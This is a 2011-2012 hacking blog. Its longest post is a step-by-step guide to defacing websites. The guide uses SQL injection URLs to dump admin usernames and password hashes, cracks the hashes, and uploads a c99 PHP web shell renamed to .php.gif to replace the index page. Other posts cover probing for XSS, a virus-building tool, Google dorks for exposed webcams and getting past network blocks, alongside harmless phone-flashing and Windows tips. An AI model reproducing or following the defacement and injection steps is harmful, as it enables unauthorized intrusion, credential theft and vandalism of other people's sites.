::Hacking platform::

worlds smallest operating system

2012-02-01T23:16:00.000-08:00

KolibriOS also known as KOS Its an worlds smallest OS of 3.4MB fully build in assembly language with the help of FASM.Its support almost all old and new hardware and video graphics devices, easy to use bootable with multiple devices such as floppy, pendrive cd.If you want to try visit this official website

How to deface a website???

2012-01-18T19:03:00.000-08:00

Hi, friends today i m going to tell u about defacing a website.

Defacing a website simply means that we replace the index.html file of a site by our file.

Now all the Users that open it will see our Page(i.e being uploaded by us).

First of all u should have the knowledge of :-

1. SQL Injection(For analyzing website loops)
2. Admin Password
3. Shell Script (for getting Admin Controls)

Now, lets come on main topic,our first work is finding the target website.After it:-

1>> Test the vulnerability of the websites.

for example,we have a site like this

http://www.xyz.com/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),and that would be

http://www.xyz.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar that means the Site is vulnerable to SQL injection.

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.xyz.com/news.php?id=5 order by 1/* <-- no error

http://www.xyz.com/news.php?id=5 order by 2/* <-- no error

http://www.xyz.com/news.php?id=5 order by 3/* <-- no error

http://www.xyz.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.
So we have

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

4). Check for MySQL version

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:-

http://www.xyz.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .
What we need is convert() function
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .

5). Getting table and column name

Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.xyz.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.

http://www.xyz.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists

http://www.xyz.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.
If can't guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1.
now to view the second table, we change limit 0,1 to limit 1,1
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.
for third table we put limit 2,1

i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
ie.

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.
For that we use concat() , i decribe it earlier.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@gmail.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:

1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password.

To crack the password there are three ways:-

1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php

http://passcracking.com/index.php

3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar

Password = OwlsNest

2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.

1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/

2) You can use an admin finder software:

Code:
http://rapidshare.com/files/248020485/adminfinder.rar

After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar

Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)

find the c99.php.gif and click it..

Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file.
So if any one goes to that site they will see your page....

After Doing This click on Logout and You are Done..

Enjoy;:))

How to lock data of your system without using third party software???

2012-01-12T10:11:00.000-08:00

Hi, friends,, I found that many people wants to keep their personnel data secure or locked. i m going to tell you the easiest way to do so without third party software in just few steps.

step :- 1. Copy the text below and save it as lock.bat using notepad, here u can give any name at the place of lock in lock.bat.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

step :- 2.Run the bat file by simply double clicking on it. A folder named "locker" will be generated on same screen where "locker.bat" will be saved.

step :- 3. Keep all those data to which you want to lock in locker folder.

step :- 4.To lock the data double click on "locker.bat" and enter "y/Y". Now the folder named locker will not be shown. i.e data will be locked or hidden.

step :- 5.To unlock or view your data, again double click on "locker.bat" and give any password , and select enter. Now you can easily your data again.

step :- 6. To lock again repeat the step 4. and you be happy to get your result..

Enjoy ;0))))

How to change logon screen in windows 7

2012-01-11T11:42:00.000-08:00

There are many people who really get bored by looking same logon screen regularly. Many people wants to change the logon screen as their own choice. today i m going to tell you the simplest way to change logon screen without using third party software in just few steps.

This method will require you to modify the registry.

Step 1: Open the Windows Start menu and enter regedit into the search bar.

Step 2: Right click on HKEY_LOCAL_MACHINE. and select Find in edit option.

Step 3: Search for OEMBackground, which should be in Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background. If the key does not exist, add a new DWORD value with the name OEMBackground.

Step 4: Double click on the entry OEMBackground, and change the value from 0 to 1.

Step 5: Open Windows Explorer and go to the following path:-

%windir%\system32\oobe.

Step 6: Create a new folder named info, and open it.

Step 7: Create a new folder within info named backgrounds.

Step 8: Rename your desired wallpaper as backgroundDefault.jpg and place it inside the folder backgrounds (images must be less than 245KB in size).

Step 9: Just Log off and logon your pc and you will be amazing to new look of your logon screen.
Enjoy!!!!!!!!!!!

Facebook Hacker Cup 2012

2012-01-10T02:55:00.000-08:00

Golden chance for hackers.........Facebook has open it 2012 hackathon. According to facebook "Hackathons are a big tradition at Facebook. They serve as the foundation for some great (and not so great) ideas. It gives our employees the opportunity to try out new ideas and collaborate with other people in a fun environment". So its a great chance for hackers.
facebook will give awesome rewards to the winners:
The finalists will be competing for:
1st place: $5,000 USD
2nd place: $2,000 USD
3rd place: $1,000 USD
4th - 25th place: $100 USD
The top 100 scoring contestants in Online Round 2 will get a Hacker Cup t-shirt. A cash prize of equivalent value may be given where required by law, or at Facebook's discretion. Any duties and taxes (if applicable) are the sole responsibility of the recipients.
Registration is open from january 1, 2012 and ends on January 23, 2012 at 4:00 PM PT interested Hackers can register HERE For more question visit facebook FAQ link click here

How to detect and attempt XSS attack tutorial

2012-01-06T21:01:00.000-08:00

What is Cross Site Scripting(XSS)?
XSS stands for Cross Site Scripting,It is a vulnerability found in web applications and can be exploit through web browser or script.an XSS attack is when an attacker managesto inject Java script code or sometimes other code (usually Java Script) into awebsite causing it to execute the code.its can be found in this type of written web script:

if(isset($_GET['some_text']))
{
$var = $_GET['_some_text'];
print $var;
}

and it will generate url like something http://www.sitename.com/somescript.php?some_text=some_input from user
but it will be a problem if somebody inject this type of code after the url
//http://www.sitename.com/somescript.php?some_text=it will redirect the user to the phishing site and victim will be under threat.

There are two types of XSS:
1)Script injection--- it will remain persistence
2)temporary script alteration-- it will not remain persistence
How to find that site is vulnerable or not:
put this code after the url alert('hello'); with script tag befor and after this code and click reload
and if it show alert box means site is vulnerable to attack; MORE TUTORIALS ARE COMING SOON KEEP VISITING REGULARLY FOR MORE TUTORIALS

General term used in hacking

2012-01-05T20:47:00.000-08:00

Vulnerability:- A security holes in any computer system or network.
Exploit :- A piece of code or program used to attack on any vulnerability of security system of computer or network.:-)
Payload:- A piece of software use to control any computer system or network after its been hacked.
Spoofing :- Its a type of forgery used to make fool of security system of any computerised system eg-IP spoofing means it make to believe the computer that transmission is comming from the right place.
Phreaking :- It is an idea of cracking the phone network. Eg- hacking the phone network to make long distance call in low rate etc.
Sniffing :- It is a technique to steal password or username through the packets data going on the network.
Backdoor :- It is well clear by it name, its a security hole that hacker use to control or execute their code through this.

How to flash nokia dead phone with usb cable

2012-01-02T03:46:00.000-08:00

Flash your nokia dead phones
Today i am showing you how to flash nokia dead cell phones
To do this you should have two softwares
1)Nokia phoenix software
2)Nokia data packet manager lite
here is the link to download both software
Nokia Phoneix and Nokia Data Package Manager Lite
and install both.

NOW COME TO THE REAL PART

first you have to download firmware for your phone model for that open nokia data pacakge manager lite and enter your phone Product Type and Product Code.
To find product Type ........... dial *#0000# it will give you your phone product type something as RM-XXX
To find product type take out your battery and see to backside of your phone it is written there.
enter the both and click on search button that will show two files firmware files and content file deselect the content file if it is there, then click on download selected.It will take some time as per your data connection speed.Download done!

now open the folder where your firmware is downloaded by nokia data packet manager lite
and double click on that file as shown below and click on browse file to extract somewere or you can choose default folder then click on extract option it will extract the package in a folder named RM-XXX.

now open nokia phoneix and set the pacakage path where you have extracted the file as shown below

Connect your mobile phone with computer and open nokia phoneix software .
and select no connection option as shown below:

now go File->open product click then enter your product type then hit OK as shown below:-

GOTO THE Flashing->Firmware update and click as shown below:

It will show the product information and software version window like below if it is not showing then check the above steps.
check the option Dead Phone USB Flashing Then refurbish button

it will start flashing. Have patience it will take some minutes.
If you have any query or you like the post use comment box or email me.
Thanks.

GOOGLE DORKS

2011-12-20T04:04:00.000-08:00

If you are new in Hacking, maybe it will be a new term for you.But it is very famous in hackers world now a days.Actually its all are google search opreators, means hackers are taking benefit of google search techniques. For instance, if we type in google search bar "link:www.google.com" without quotes it will not do a normal search instead it will search only all the pages that has link with www.google.com.Some of its operators can be find in google Advance search but not all.Now how it will be helpful for hackers suppose you want to see the unprotected network cameras then open the google search bar and type "inurl:view/index.shtml" without quotes it will show you the unprotected webcams.

So here is the list of some google Dorks:
intitle:
intitle:
intext:
allinurl:
cache:

SQLmap sql injection tool

2011-12-20T03:08:00.000-08:00

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.This is sqlmap official video demonstration:Download this from HERE

Tool to create your own virus

2011-12-18T01:02:00.000-08:00

Terabit virus maker is a virus creating tool. There is no need to know any programming language to create virus with this software. Use it wisely means in virtual machine otherwise it will harm your computer.Disclaimer: Use this software for educational purpose only not to harm anyone.

Download it from hereIf link is Broken inform me in comments.link updated check nownew link of mediafire

::Hacking platform::: Ncrack by builders of nmap

2011-12-16T00:44:00.000-08:00

::Hacking platform::: Ncrack by builders of nmap

How to use nmap to scan port and detect os, port etc.

2011-12-08T22:50:00.000-08:00

To hack any website or server we should know what is running on the server means which os is using, which server script is running what ports are open. For that we uses many different port scanners but Nmap is most popular and better. First you have to install it on your system. I recommend linux for nmap because linux is made for networks and it works great with that, but if you are a windows user don't be afraid it support windows also, just goto the nmap site and download and install.For linux ubuntu user :- you can type in terminal "sudo apt-get install nmap" without quotes.
GOTO terminal window in linux and cmd in windows type nmap if is showing like below means it is working and ready to use.

There is different commands for every services so first you have to decide what things you want to know.For details tutorial see this link

hacking language

2011-12-08T22:31:00.001-08:00

How to open restricted websites

2011-12-08T17:38:00.000-08:00

Sometime few websites like facebook, youtube,twitter are blocked by network administrator.Its a common problem in universities, schools and work places.
Here is the way how to open these websites in restricted network......
STEP 1:Open mozilla firefox and goto tools->options and click

STEP 2:Goto advanced->network->settings

STEP 3: goto website http://hidemyass.com/proxy-list/ and choose fast proxies with port 80:

STEP 4:Come back to the step2 now click settings a window will popup select manual proxy configuration enter the ip address and port no which you have taken from the website also check the checkbox of use this proxy server for all prorocols

HIT OK and enjoy.

Ncrack by builders of nmap

2011-12-08T00:12:00.000-08:00

Ncrack is a powerful authentication cracker tool.It is an open source tool to test and exploit any network authentication system available for almost all platform linux, windows e.t.c. you can download it from here for windows.